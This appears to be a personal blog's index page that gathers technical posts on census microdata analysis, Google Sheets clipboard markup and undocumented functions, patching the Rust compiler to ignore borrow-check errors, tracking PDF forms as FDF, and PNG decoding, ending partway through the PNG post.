SmitopAboutUsesAccounts

Everything

Last updated Aug 16, 2021

This is all the pages and posts on my website:

Playing with raw census data

By · · 6 minute read

Statistics Canada publishes “public use microdata files” that contain an anonymized random sample of census responses. The most recent version available is from the 2016 census. Statistics Canada hasn’t published microdata files for the 2021 census yet. The Individuals File for 2016 is a 2.7% sample of census responses.

Getting the data

It turns out you can’t just directly download the data. Instead, you have to fill out a form with information about yourself, and wait for your request to be manually processed. The wording of the form made it sound like they were going to mail me the data on a physical medium, but luckily I got an email with instructions a few days later instead. From there, I had to create an account on a website for exchanging data with Statistics Canada, and then finally I could log in and download the data from the CRSB_ADHOC_CENSUS_PUMF depot. Note that if you order any of the PUMF products you can access all of them with your E-transfer account.

If you want to work with the data without going through that process, you can download the data from Kaggle or the Internet Archive. Note that I didn’t include documentation files with that.

Using the data

The data is stored as a single file with a record on each line. Each field is stored in a specified range of characters on each line (left padded with spaces if needed). Fields are stored next to each other, and you can only separate them with knowledge of the schema. The schema is provided in a few formats, all of which are intended for use with proprietary statistical software.

I used one of the schema files that was somewhat easy to parse to generate a CSV version of the data, which just adds a header and sprinkles in some commas on each row. I found my CSV version was a lot easier to work with using pandas. Some of the schema data is lost this way though – if you use the raw data with the intended statistical software it will be able to use the schema to automatically infer the meaning of integer values in categorical columns, unlike with a simple CSV.

The data was sampled using stratified sampling, so not all rows have the same weight. As such, you need to multiply each row by the WEIGHT column to get accurate results. You can also use the WT1-WT16 columns in place of WEIGHT to get multiple smaller random samples – the WTX columns are 0 for most rows, but correspondingly bigger on rows where they are non-zero.

I’ve done some experimenting with the data using the Python pandas library. See this notebook for the full details on how I got these results. One simple thing we can do is deterimne the total population. By adding up all the weights, we get the population of Canada on the census reference date (May 10, 2016):

>>> df = pd.read_csv("/path/to/data.csv")
>>> df["WEIGHT"].sum()
34460064.00006676

Let’s see what other columns we have available to work with:

>>> df.columns.values
array(['PPSORT', 'WEIGHT', 'WT1', 'WT2', 'WT3', 'WT4', 'WT5', 'WT6',
       'WT7', 'WT8', 'WT9', 'WT10', 'WT11', 'WT12', 'WT13', 'WT14',
       'WT15', 'WT16', 'ABOID', 'AGEGRP', 'AGEIMM', 'ATTSCH', 'BEDRM',
       'BFNMEMB', 'CAPGN', 'CFINC', 'CFINC_AT', 'CFSIZE', 'CFSTAT',
       'CHDBN', 'CHLDC', 'CIP2011', 'CIP2011_STEM_SUM', 'CITIZEN',
       'CITOTH', 'CMA', 'CONDO', 'COW', 'CQPPB', 'DETH123', 'DIST',
       'DPGRSUM', 'DTYPE', 'EFDECILE', 'EFDIMBM', 'EFINC', 'EFINC_AT',
       'EFSIZE', 'EICBN', 'EMPIN', 'ETHDER', 'FOL', 'FPTWK', 'GENSTAT',
       'GOVTI', 'GTRFS', 'HCORENEED_IND', 'HDGREE', 'HHINC', 'HHINC_AT',
       'HHMRKINC', 'HHSIZE', 'HHTYPE', 'HLAEN', 'HLAFR', 'HLANO', 'HLBEN',
       'HLBFR', 'HLBNO', 'IMMCAT5', 'IMMSTAT', 'INCTAX', 'INVST', 'KOL',
       'LFACT', 'LICO', 'LICO_AT', 'LOC_ST_RES', 'LOCSTUD', 'LOLIMA',
       'LOLIMB', 'LOMBM', 'LSTWRK', 'LWAEN', 'LWAFR', 'LWANO', 'LWBEN',
       'LWBFR', 'LWBNO', 'MARSTH', 'MOB1', 'MOB5', 'MODE', 'MRKINC',
       'MTNEN', 'MTNFR', 'MTNNO', 'NAICS', 'NOC16', 'NOCS', 'NOL', 'NOS',
       'OASGI', 'OTINC', 'PKID0_1', 'PKID15_24', 'PKID2_5', 'PKID25',
       'PKID6_14', 'PKIDS', 'POB', 'POBF', 'POBM', 'POWST', 'PR', 'PR1',
       'PR5', 'PRESMORTG', 'PRIHM', 'PWDUR', 'PWLEAVE', 'PWOCC', 'PWPR',
       'REGIND', 'REPAIR', 'RETIR', 'ROOMS', 'SEMPI', 'SEX', 'SHELCO',
       'SSGRAD', 'SUBSIDY', 'TENUR', 'TOTINC', 'TOTINC_AT', 'VALUE',
       'VISMIN', 'WAGES', 'WKSWRK', 'WRKACT', 'YRIMM'], dtype=object)

The meaning of all of those columns is documented in the handy user guide for the data.

Working with categorical data

The KOL column indicates people’s Knowledge Of the official Languages of Canada (English and French). Let’s make a graph of the data:

A bar chart

Working with numberic data

The WAGES column has the total wages of respondents (according to income tax data) in Canadian dollars in 2015. According to the user guide, 88888888 and 99999999 are special values that indicate that no data is available or applicable. Let’s try making a histogram of all values with data available:

plt.suptitle("Total wages")
all_person_wages_df = df[(df["WAGES"] < 80000000)]
all_person_wages_df["WAGES"].plot(
    kind="hist", bins=250, weights=all_person_wages_df["WAGES"]
)

A histogram

That looks weird. It appears that values above $100,000 are rounded to avoid making any rows personally identify an individual, which makes this histogram all wacky. If we change it to only plot people with total wages under $100,000 it looks fine:

A histogram

Making a good looking histogram that includes people who make over $100,000 is left as an exercise to the reader.

Posts

By · · 0 minute read

programming

By · · 0 minute read

Smitop's Blog

By · · 0 minute read

stats

By · · 0 minute read

Tags

By · · 0 minute read

google

By · · 0 minute read

Hidden HTML markup Google Sheets adds to the clipboard

By · · 6 minute read

Google Docs/Sheets/Slides/Drawings (which all have a lot of code in common) all support copying content (such as text, images, spreadsheet cells, shapes, etc.) created in them to the clipboard and pasting it into another doc/sheet/slideshow/drawing, which might be different than the origin document. Content is copied to the clipboard as HTML, which means that hidden markup can be inserted here to support copying complex objects that can’t easily be represented as ordinary HTML.

You can try pasting some HTML in this contenteditable box, and see what HTML gets pasted:


For example, copying a smiley face shape to the clipboard results in this HTML:

<span id="docs-internal-guid-7d347fee-7fff-afd7-ca79-41b3a53d7fad">&nbsp;</span>

The internal GUID id is used to keep track of the underlying data. You can copy and paste the shape within a document, and it’ll know to duplicate the existing smiley face by looking up the GUID. This also works when pasting into another document in the same browser – it stores the GUID ⇔ data mapping in the browser’s local storage. Trying to paste it into another open browser just results in an empty text box being pasted, since the other browser doesn’t have any data stored for the pasted GUID. GUID linking allows these Google apps to store more data on the clipboard than would otherwise be supported.

Google Sheets takes a different approach than Docs/Slides/Drawings to storing additional data on the clipboard. In this example, the second column has a formula that doubles the first column (=2*A1) – here’s what that looks like when pasted:

3 6

And here’s the (formatted) HTML that gets copied to the clipboard:

<style type="text/css">td { border: 1px solid #ccc; } br { mso-data-placement: same-cell; }</style>
<table
  style="
    table-layout:fixed;font-size:10pt;font-family:Arial;
    width:0px;border-collapse:collapse;border:none
  "
  dir="ltr" cellspacing="0" cellpadding="0" border="1"
>
  <colgroup>
    <col width="100">
    <col width="100">
  </colgroup>
  <tbody>
    <tr style="height:21px;">
      <td
        style="
          overflow:hidden;padding:2px 3px 2px 3px;
          vertical-align:bottom;text-align:right;
        "
        data-sheets-value="{&quot;1&quot;:3,&quot;3&quot;:3}"
      >3</td>
      <td
        style="
          overflow:hidden;padding:2px 3px 2px 3px;
          vertical-align:bottom;text-align:right;
        "
        data-sheets-value="{&quot;1&quot;:3,&quot;3&quot;:6}"
        data-sheets-formula="=2*R[0]C[-1]"
      >6</td>
    </tr>
  </tbody>
</table>

Instead of inserting an opaque GUID into the clipboard, Google Sheets takes a different approach: putting all the relevant data as data- attributes on the copied data. It uses the data-sheets-value and data-sheets-formula attributes to encode the data and formula of the cell.

For cells that have a value determined by a formula, data-sheets-formula contains that formula. Cells references (such as A2) are converted to relative references1, such as R[0]C[-1] for the cell one column to the left2. This format is different than the internal (unexposed) representation which represents cell contents as structured data. (fun fact: formulas are also internally stored in stack-based language that describes their execution; that formula gets stored as LD2]R3]F*:2]S)

The data-sheets-value attribute is a JSON object containing the value in the cell. The "1" field has an integer containing the data type, and the other field has the field name of that integer, with a value corresponding to how types of that value are encoded. For example, the type for boolean values is 4, so FALSE gets encoded as {"1":4,"4":0}. The textual representation of the value is separate from the actual value, and only the data-sheets-value attribute is checked when pasting in cells. The actual text content of the <td> element is ignored.

An odd consequence of the way values are stored is that if you copy cells from Google Sheets, edit them in an external HTML editor, then paste them back in, your modifications don’t get reflected in the pasted cells. It also means that if you copy some text into an HTML editor, then change the text, the original text is still around in an attribute.

The data-sheets-value attribute was how I first noticed these attributes. I have a habit of looking at the raw sources of emails I receive, so I noticed when I received an HTML email with parts copied from a spreadsheet, with slightly different text in the data-sheets-value attribute than the body of the email. Be sure to keep in mind that the reader can see the originally pasted text when pasting from Google Sheets into an HTML document!


  1. Except for references like $A$1, where the dollar signs explicitly disable this behaviour. In that case it’s stored as an absolute reference, such as R3C2↩︎

  2. You can’t use R1C1 notation when writing a formula directly in Sheets, pasting it in is the only way to use it (unlike Excel). However, INDIRECT does allow this notation when the second parameter is FALSE↩︎

Undocumented Google Sheets formula functions

By · · 7 minute read


Google Sheets has several functions that can be used in formulas. By looking at the source code, we can find a list of all available formula functions. By diffing that against the list of formula functions in the documentation, we can get a list of undocumented functions.

The reason for not documenting these functions varies, but I’ve made some arbitrary guesses as to what’s going on with these functions.

All of these are called in the normal way: by writing something like =DEBUG_THROW_ERROR() or =UNARY_PLUS("3") into a cell.

I find these undocumented functions (and the reasons for that) weirdly interesting. I hope you do too!

Debugging functions

The code that references the names of these functions is nested deep in the formula evaluation process – I missed these the first time I looked for undocumented formulas. Here they are:

  • DEBUG_THROW_ERROR throws an error when evaluated, and results in a popup saying

    There was an error during calculation. Some formulae may not be calculated successfully. Undo your last change and try again.

    There is a screen-covering modal dialog after you do this, so the only way to fix a spreadsheet that has this function in it is to delete the relevant cell before formula evaluation starts after loading the page.

  • DEBUG_TOKEN_INDEX returns the index of the formula token that calls the function

  • DEBUG_CONDITIONAL takes a cell range and returns nothing

  • DEBUG_OPTIONAL_RANGE_REF optionally takes a cell range and returns a number

Easter eggs

A few functions appear to be easter eggs:

  • WHATTHEFOXSAY returns a random thing that foxes say, and actually has some use cases
  • COINFLIP is randomly either TRUE or FALSE. It appears to only recalculate once per spreadsheet modification, unlike RAND.
  • CURSORPARK provides a nice cursor park:
    🌳	🌳	🌳	🌳	🌳	🌳	🌳	🌳
    🌳	 	 	  	🐝 	  	🐌	🌳
    🌳	 	🐇	  	  	  	  	🌳
    🌳	🌻	 	  	  	  	🐑	🌳
    🌳	🌳	🌳	🌳	🌳	🌳	🌳	🌳
    
  • DUCKHUNT results in a duck emoji: 🦆
  • RITZCODERZ and TRIXTERNS list people who presumably worked on Google Sheets: trix is the codename for Google Sheets (maTRIX), and I think ritz is the codename for the 2013 rewrite.

Lambdas

BYCOL, BYROW, CALL, CONTINUE.LEGACY, LAMBDA, MAKEARRAY, MAP, REDUCE, SINGLE, SCAN

Excel has support for lambda functions, and it seems that Google Sheets may soon also gain support for them! Currently, they are treated as if they don’t exist if you type them in (there is probably a flag that the Sheets developers can set to test them). At one point these functions accidentally had in-editor documentation.

Legacy functions

AND.LEGACY, COUNTA.LEGACY, COUNTIF.LEGACY, DAY.LEGACY, HOUR.LEGACY, MATCH.LEGACY, MEDIAN.LEGACY, MINUTE.LEGACY, MMULT.LEGACY, MONTH.LEGACY, OR.LEGACY, ROUND.LEGACY, SECOND.LEGACY, SUMIF.LEGACY, SUM.LEGACY, TEXT.LEGACY, VLOOKUP.LEGACY, YEAR.LEGACY

These are variants of documented formulas, but with .LEGACY appended. The legacy variants of boolean functions treat all strings as falsey, while the normal variants automatically parse "true"/"false" into boolean values. Perhaps an earlier version of Sheets had the wrong behaviour, and there’s some logic to convert old calls to these functions to the legacy versions?

Variant versions

ISDATE_STRICT, ISDATETIME_STRICT, ISTIME_STRICT, and STDEV.INEXACT are all variants of their main functions. Probably for the same reasons as the *.LEGACY functions?

Unimplemented Excel compatibility

CUBEKPIMEMBER, CUBEMEMBER, CUBEMEMBERPROPERTY, CUBERANKEDMEMBER, CUBESET, CUBESETCOUNT, CUBEVALUE, FIELDVALUE, INFO, NOEXPAND, REGISTER.ID, RTD, WEBSERVICE

These formulas are treated as not existing, except the error message is different:

This function is not fully supported in Sheets. Please see the help centre for more information.

Despite what that error might imply, these functions are not supported at all. I think this is just to give a better error message for imported Excel files with unsupported formulas.

Conditions

CONDITION_BLANK, CONDITION_BLANK.INEXACT, CONDITION_EQ, CONDITION_LT, CONDITION_LT.INEXACT, CONDITION_NE, CONDITION_ONE_OF_RANGE, CONDITION_ONE_OF_RANGE.INEXACT, and CONDITION_TEXT_EQ are used internally when applying conditional formatting and data validation, where the “Format cells if…” input allows either using a custom formula or selecting a comparison option from a menu. These functions are used to implement this.

CONDITION_FLATTEN andCONDITION_GRADIENT are used internally for conditional formatting gradients.

Replaced functions

These functions are treated as not existing, except the error message is:

The X function has been replaced with the Y function.

GOOGLECLOCK used to return the time on Google’s servers, but the suggested replacement NOW returns the time on the current system. Perhaps Google thought that supporting GOOGLECLOCK wasn’t worth it when NOW is usually good enough?

GOOGLEREADER presumably did something to do with Google Reader, before Reader was shut down. The suggested replacement is IMPORTFEED.

Internal

ARRAY_LITERAL and ARRAY_ROW are used internally to transform array syntax (like {1,2,3}) into function calls.

ARRAY_LITERAL gets a passing mention in a 2013 video introducing the new Google sheets (probably by accident), but has no other documentation.

Not yet implemented

With XLOOKUP and XMATCH, if you provide the wrong number of arguments it gives an error complaining about the wrong number of arguments, but if you provide the right number it claims the function doesn’t exist. This is probably because they are currently partially implemented versions of their Excel counterparts.

Unknown

UNARY_{PLUS,MINUS} function the same as the documented function U{PLUS,MINUS}. I don’t know why they exist. At first I thought they were internally used to implement unary prefixes in formulas like =+("5"), but that gets translated to a call to UPLUS (which is documented) internally.

Accidentally undocumented

BAHTTEXT, BINOM.DIST.RANGE, COUNTUNIQUEIFS, and PERCENTIF are all fairly normal functions, and all have documentation shown when typing the function into the formula input, but aren’t listed in the list in the documentation. They do have documentation pages that are linked to from that list though. The exclusion from the list of formulas seems to be an oversight.

REFERENCE is entirely undocumented, for reasons unbeknownst to me. You can use it to get all the cells in a specified range. It’s redundant to the documented ARRAYFORMULA function: REFERENCE(A1, B2) is the same as ARRAYFORMULA(A1:B2). Excel doesn’t appear to have a similar function.

Bonus: foreign languages

A lesser known feature (but documented) of Sheets and Excel that I found while writing this is that there is support for localized formulas for some languages. You can write =KÜRZEN(5.5) (make sure to put the umlaut on the Ü) instead of =TRUNC(5.5) if you prefer to write your spreadsheets in German.

rust

By · · 0 minute read

Turning off Rust's borrow checker, completely

By · · 7 minute read

I recently came across #[you_can::turn_off_the_borrow_checker], a Rust macro that makes it so the borrow checker is “turned off” for a function. It transforms the code of a function to transform reference manipulations into unsafe code that does that without the borrow checker knowing.

Of course, this is not the sort of thing you would want to use in production, or really for anything other than education and experimentation. However, it made me curious if it could be implemented at a lower level: can we patch the compiler to remove the borrow checker? Yes.

The obvious way to do that would be to just not run the pass that does borrow checking. The analysis pass (technically it’s a query not a pass but that’s not relevant here) of the compiler does a lot of things, including some borrow checking. Let’s just not run the analysis pass! Just return early so that no analysis is run:

fn analysis(tcx: TyCtxt<'_>, (): ()) -> Result<()> {
    return Ok(()); // don't actually do any analysis!
    ...

That makes it so the rest of the function isn’t run, and causes an unreachable statement warning when compiling the compiler.

This kinda works. Most valid Rust code still works with this patched compiler. It is occasionally prone to internal compiler errors (ICEs), and sometimes you extra bonus errors as a result of parts of the compiler assuming that parts of the analysis have been performed. But alas, removing the analysis pass still leads to some borrow checking. We’re going to need to use the nuclear option: ignoring errors entirely. Deep within the part of the compiler that emits errors is HandlerInner::emit_diagnostic, which emits an error diagnostic. Part of that function checks if we’re emitting an error, and if so increments a counter:

if matches!(diagnostic.level, Level::Error { lint: true }) {
    self.bump_lint_err_count();
}

Before starting codegen, the compiler checks if the error count is non-zero, and aborts if so. But if we just remove that call to bump_lint_err_count, the number of errors will always be zero. The errors will still be displayed, but won’t prevent compilation from succeeding. Normally the compiler doesn’t bail after an error but keeps going, and then only aborts before the next phase of compilation. This makes it so if there are multiple errors with some code, you get to see all of them at once. But by not incrementing the error count, we’ll fool the compiler into thinking there are no errors! Here’s the patch if you want to follow along at home.

This means that errors are generated and displayed, but the patched compiler just ignores the fact that there are errors and tries to generate code anyways.

This can’t catch some fatal errors that stop compilation right away, but luckily most errors let the compiler keep going until some future stopping point (but that future stopping point won’t happen now, since the error count is always 0).

At this point, I was pretty sure that this wouldn’t actually work. It does. Here’s an example of Rust code that the borrow checker doesn’t like:

fn hold_my_vec<T>(_: Vec<T>) {}

fn main() {
    let v = vec![2, 3, 5, 7, 11, 13, 17];
    hold_my_vec(v);
    let element = v.get(3);

    println!("I got this element from the vector: {:?}", element);
}

And here’s what happens when we run that through our patched compiler:

error[E0382]: borrow of moved value: `v`
    --> src/main.rs:6:19
     |
4    |     let v = vec![2, 3, 5, 7, 11, 13, 17];
     |         - move occurs because `v` has type `Vec<i32>`, which does not implement the `Copy` trait
5    |     hold_my_vec(v);
     |                 - value moved here
6    |     let element = v.get(3);
     |                   ^^^^^^^^ value borrowed here after move
     |
     = note: borrow occurs due to deref coercion to `[i32]`
note: deref defined here
    --> /home/smit/rustc-dev/rust/library/alloc/src/vec/mod.rs:2434:5
     |
2434 |     type Target = [T];
     |     ^^^^^^^^^^^^^^^^^^

For more information about this error, try `rustc --explain E0382`.
    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
     Running `target/debug/rustnoerror`
I got this element from the vector: Some(-501713657)

There’s an error, but due to our patch the compiler just keeps going along. And as a result, the compiled program produces garbage data: Some(-501713657) is not an element in the list.

Here’s how it handles an example from #[you_can::turn_off_the_borrow_checker]:

error[E0499]: cannot borrow `owned` as mutable more than once at a time
  --> src/main.rs:6:22
   |
5  |     let mut_1 = &mut owned[0];
   |                      ----- first mutable borrow occurs here
6  |     let mut_2 = &mut owned[1];
   |                      ^^^^^ second mutable borrow occurs here
...
10 |     let undefined = *mut_1 + *mut_2;
   |                     ------ first borrow later used here

error[E0505]: cannot move out of `owned` because it is borrowed
  --> src/main.rs:9:10
   |
5  |     let mut_1 = &mut owned[0];
   |                      ----- borrow of `owned` occurs here
...
9  |     drop(owned);
   |          ^^^^^ move out of `owned` occurs here
10 |     let undefined = *mut_1 + *mut_2;
   |                     ------ borrow later used here

Some errors have detailed explanations: E0499, E0505.
For more information about an error, try `rustc --explain E0499`.
    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
     Running `target/debug/rustnoerror`
1511396695

Again, it just outputs garbage data.

Here are the fun ways our patched compiler handles various error conditions:

  • Many result in an internal compiler error since codegen assumes that other parts of the compiler did their job
  • If you have non-exhaustive patterns the compiler tries to execute an illegal instruction and coredumps
  • Sometimes format strings that reference variables affected by errors cause an ICE, so you effectively have to always do std::io::stdout().write_all(...) instead of println!

Please remember not to use this for anything other than testing!

fileformat

By · · 0 minute read

pdf

By · · 0 minute read

Tracking PDF forms as plain text

By · · 4 minute read

The Canada Revenue Agency, the agency responsible for collecting taxes in Canada, publishes many tax forms. These are usually available as a fillable PDF. With fillable PDFs, you can type in answers to form fields, save the PDF, and the saved PDF contains your answers.

I want to be able to keep track of the PDFs with my answers in them with Git, but tracking the PDFs with my answers in them doesn’t work very well: you can’t easily diff them, merge conflicts are difficult to resolve, and Git doesn’t work well with large binary files.

I was able to find a good way to deal with this: extracting the data in PDF form fields to a standalone .fdf file. This file has just the data in the form fields. We can use pdftk-java to extract the FDF from a PDF file. Some older versions are prone to crashing with certain PDFs that have filled forms, so make sure you are using a recent version.

$ pdftk t1.pdf generate_fdf output t1.fdf
cat t1.fdf90
$ cat t1.fdf | head -n 35
%FDF-1.2
%����
1 0 obj

<<
/FDF
<<
/Fields [
<<
/T (form1[0])
/Kids [
<<
/T (Page3[0])
/Kids [
<<
/T (Step2[0])
/Kids [
<<
/T (Line_10400_OtherEmploymentIncome[0])
/Kids [
<<
/T (Line_10400_Amount[0])
/V (47834.42)
>>]
>>
<<
/T (Line_12100_InvestmentIncome[0])
/Kids [
<<
/T (Line_12100_Amount[0])
/V (52455.55)
>>]

The FDF format is a tad verbose (it is a stripped down version of the PDF file format), but all of the form inputs are there: $47834.42 for my other employment income, and $52455.55 for my investment income. All of the other form inputs are in the file. pdftk generates the inputs in a weird order: it decided to start with step 2 on page 3. It seems to be consistent though, so there shouldn’t be any big changes in diffs.

We can merge a modified FDF file back into the PDF similarly:

pdftk t1.pdf fill_form t1.fdf output filled.pdf

My general workflow is to take the existing FDF and create a filled PDF, edit that filled PDF, save it, then extract the new FDF. This way I can keep track of the file as a plaintext file tracked in Git, with diffs and merges working as expected.

Manipulating the form with a full PDF viewer, instead of typing values directly into the FDF file, ensures that the data you put in is validated. PDF files can have arbitrary embedded JavaScript to validate form inputs. The CRA takes extensive advantage of this feature, with ~4000 lines of common validation logic shared across all of their PDF forms. Unfortunately, not all PDF readers fully support PDF JavaScript, so most of the validation doesn’t work if you aren’t using an official PDF reader from Adobe.

XFDF is an XML-based version of FDF that seems nicer to work with, but it doesn’t have much support in the PDF tools ecosystem. Hopefully, more tools will gain the ability to deal with XFDF, since it’s a much nicer format to deal with than FDF.

Digression: Why use paper forms at all?

Question
If you’re going to track your answers electronically, why use the PDFs at all? Why not just use NETFILE and directly store the data?
I had looked into using NETFILE to directly store the tax return data as a .tax file. Unfortunately, only certified tax software can actually file returns using the service. You can’t even access the API documentation without being certified.

They don’t even let you send them filled PDFs electronically! I would be willing to directly send them my filled PDFs, but instead I have to print them out, mail the printed PDF to them, and have someone at the CRA type my form back into their system!

Each step of decoding a PNG

By · · 11 minute read
<style>
    body {
        font-size: 103%;
        line-height: 1.5;
        text-align: justify;
    }
    p {
        max-width: 45rem;
    }
    .chunks {
        width: 100vw;
        position: relative;
        margin-left: -52vw;
        left: 50%;
        text-align: center;
    }
    .chunk {
        border: 2px solid black;
        border-bottom: 0;
        width: 20em;
        max-width: 85vw;
        display: inline-block;
        height: max-content;
        height: fit-content;
        vertical-align: top;
        margin-right: 1em;
        margin-bottom: 1em;
        text-align: left;
    }
    .chunk .chunk-header {
        font-weight: bold;
        text-align: center;
        font-size: 1.5em;
    }
    .chunk > div {
        border-bottom: 2px solid black;
        padding: 4px;
    }
    .chunk > div > .chunk-label {
        display: block;
        font-weight: bold;
        font-size: 1.1em;
    }
    .chunk-bytes {
        font-family: monospace;
    }
    .chunk table th {
        text-align: right;
    }
    .chunk-IDAT {
        background: #f7f73a;
    }
    .chunks {
        margin-top: 1rem;
    }
    .chunk-extra {
        display: none;
    }
    #all-chunks:checked ~ .chunks > .chunk-extra {
        display: inline-block;
    }
    .filt-label {
        display: inline-block;
        width: 5rem;
    }
    .filt-amount {
        background-color: rgb(194, 194, 194);
        display: inline-block;
    }
    .filt-counts div:nth-child(2n) .filt-amount {
        background-color: rgb(161, 161, 161);
    }
    .filt-counts {
        margin-bottom: 1rem;
    }
    .inter-passes > img {
        display: inline;
        margin-right: 1rem;
        vertical-align: top;
    }
    img {
        max-width: calc(100vw - 36px);
        height: auto;
        position: relative;
    }
    .chunk-char-table {
        text-align: left;
    }
    @media (max-width: 530px) {
        .chunk {
            margin-right: 0;
        }
    }
</style>
<div>
    <p>Let's look at the complete process of decoding a <abbr title="Portable Network Graphics">PNG</abbr> file. Here's the image I'll be using to demonstrate:</p>
    <img src="https://smitop.com/avatar/a256.png" width="256" height="256" alt="Several letter 'S's on top of each other, each with a different color." />
</div>
<div>
    <h2>Chunking</h2>
    <p>PNG files are stored as a series of chunks. Each chunk has a 4 byte length, 4 byte name, the actual data, and a CRC. Most of the chunks contain metadata about the image, but the <code>IDAT</code> chunk contains the actual compressed image data. The capitalization of each letter of the chunk name determines how unexpected chunks should be handled:</p>
    <table class="chunk-char-table">
        <tbody>
            <tr><th>UPPERCASE</th><th>lowercase</th></tr>
            <tr><td>Critical</td><td>Ancillary</td><td>Is this chunk required to display the image correctly?</td></tr>
            <tr><td>Public</td><td>Private</td><td>Is this a private, application-specific, chunk?</td></tr>
            <tr><td>Reserved</td><td>Reserved</td><td></td></tr>
            <tr><td>Safe to copy</td><td>Unsafe to copy</td><td>Do programs that modify the PNG data need to understand this chunk?</td></tr>
        </tbody>
    </table>
    <img src="https://smitop.com/Chunk-letters.svg" alt="c: Ancillary, H: Public, R: Reserved, M: Unsafe to copy" width="571" height="251" />
    <p>Here are the chunks in the image:</p>
    <input type="checkbox" id="all-chunks"><label for="all-chunks"> Show metadata chunks</label>
    <div class="chunks">
        <div class="chunk chunk-important">
            <div class="chunk-top"><div class="chunk-header">Signature</div> This identifies the image as a PNG. It contains newline characters and other characters that often get mangled to ensure that the binary image data didn't get corrupted.</div>
            <div class="length"><span> <span class="chunk-bytes"> 89 50 4E 47 0D 0A 1A 0A</span> </span></div>
        </div>
        <div class="chunk chunk-IHDR chunk-important">
<div class="chunk-top"><div class="chunk-header">Header</div> This contains metadata about the image.</div>
<div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 0D</span> = 13 bytes long</span></div>
<div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 49 48 44 52</span> = IHDR</span></div>
<div class="type">
    <span class="chunk-label">Data</span>
    <span>
        <span  class="chunk-bytes"> 00 00 01 00 00 00 01 00 08 02 00 00 00</span>
        <table>
<tbody>
    <tr><th>Width</th><td>256</td></tr>
    <tr><th>Height</th><td>256</td></tr>
    <tr><th>Bit depth</th><td>8</td></tr>
    <tr><th>Color space</th><td>Truecolor RGB</td></tr>
    <tr><th>Compression method</th><td>0</td></tr>
    <tr><th>Fitler method</th><td>0</td></tr>
    <tr><th>Interlacing</th><td>disabled</td></tr>
</tbody>
    </span>
</div>
<div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> D3 10 3F 31</span></div>
Gamma
This contains the image gamma, used to display more accurate colours.
Length 00 00 00 04 = 4 bytes long
Type 67 41 4D 41 = gAMA
Data 00 00 B1 8F = 45455
CRC 0B FC 61 05
Color space information
This contains data about where in the full CIE color space the colors in the image are, so that monitors that support colors outside the standard sRGB space can display the image better.
Length 00 00 00 20 = 32 bytes long
Type 63 48 52 4D = cHRM
Data 00 00 7A 26 00 00 80 84 00 00 FA 00 00 00 80 E8 00 00 75 30 00 00 EA 60 00 00 3A 98 00 00 17 70
    </span>
</div>
<div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> 9C BA 51 3C</span></div>
Physical dimensions
This contains the physical dimensions of the image, so it can be displayed at the right physical size when possible.
Length 00 00 00 09 = 9 bytes long
Type 70 48 59 73 = pHYs
Data 00 00 0B 13 00 00 0B 13 01 2835 pixels = 1 metre
CRC 00 9A 9C 18
Last modification date
This contains the time the image was created at.
Length 00 00 00 07 = 7 bytes long
Type 74 49 4D 45 = tIME
Data 07 E5 05 0A 0A 2F 2C 2021-05-10, 10:47:44 (UTC)
CRC 00 53 9E DD
Background color
This contains the background color of the image to be displayed while the image is loading
Length 00 00 00 06 = 6 bytes long
Type 62 4B 47 44 = bKGD
Data 00 FF 00 FF 00 FF = white
CRC A0 BD A7 93
Image data
This contains the compressed image data.
Length 00 00 F5 51 = 62801 bytes long
Type 49 44 41 54 = IDAT
Data ... (the compressed and filtered bytes of the image)
CRC BF EB 1B 15
Text
This can store arbitrary tagged textual data about the image.
Length 00 00 00 27 = 39 bytes long
Type 74 45 58 74 = tEXt
Data 46 69 6C 65 00 2F 68 6F 6D 65 2F 73 6D 69 74 2F 50 69 63 74 75 72 65 73 2F 69 63 6F 6E 33 2F 33 64 2E 62 6C 65 6E 64 = key: "File", value: "/home/smit/Pictures/icon3/3d.blend"
CRC 88 DA 55 E7
Text
This can store arbitrary tagged textual data about the image.
Length 00 00 00 13 = 19 bytes long
Type 74 45 58 74 = tEXt
Data 52 65 6E 64 65 72 54 69 6D 65 00 30 30 3A 31 32 2E 31 35 = key: "RenderTime", value: "00:12.15"
CRC 5E 2F 7A B4
        <div class="chunk chunk-important">
            <div class="chunk-top"><div class="chunk-header">Trailer</div> This empty chunk indicates the end of the PNG file.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes">00 00 00 00</span> = 0 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes">49 45 4E 44</span> = IEND</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes">AE 42 60 82</span></div>
        </div>
    </div>
</div>
<div>
    <h2>Extracting the image data</h2>
    <p>We take all of the <abbr title="Image DATa"><code>IDAT</code></abbr> chunks and concatenate them together. In this image, there is only one <code>IDAT</code> chunk. Some images have multiple IDAT chunks, and the contents are concatenated together by the PNG decoder. This is so streaming encoders <a href="https://stackoverflow.com/a/29517059/10113238">don't need to know the total data length up front</a> since the data length is at the beginning of each chunk. Multiple IDAT chunks are also needed for encoding images with image data having a length longer than the largest possible chunk size (255<sup>4</sup>) Here's what we get if treat the compressed data as raw image data:</p>
    <img src="https://smitop.com/fmat/png/idat-raw.png" width="256" height="256" loading="lazy" alt="Random noise on the top third, with the rest black." />
    <p>It looks like random noise, and that means that the compression algorithm did a good job. Compressed data should look higher-entropy than the lower-entropy data it is encoding. Also, it's less than a third of the height of the actual image: that's some good compression!</p>
</div>
<div>
    <h2>Decompressing</h2>
    <p>The most important chunk is the <code>IDAT</code> chunk, which contains the actual image data. To get the filtered image data, we concatenate the data in the <code>IDAT</code> chunks, and decompress it using zlib. There is no image-specific compression mechanism in play here: just normal zlib compression.</p>
    <img src="https://smitop.com/fmat/png/idat.png" width="256" height="256" loading="lazy" alt="The example image, increasingly skewed to right from top to bottom. It is mostly black and white, with pixels of intense color scattered throughout." />
    <p>Aside from the colors looking all wrong, the image also appears to be skewed horizontally. This is because each line of the image has a filter as the first byte. Filters don't directly reduce the image size, but get it into a form that is more compressible by zlib. I <a href="https://observablehq.com/@smitop/png-filters">have written about PNG filters before</a>.</p>
</div>
<div>
    <h2>Defiltering</h2>
    <p>We take the decompressed data and undo the filter on each line. This gets us the decoded image, the same as the original! Here's the popularity of each filter type:</p>
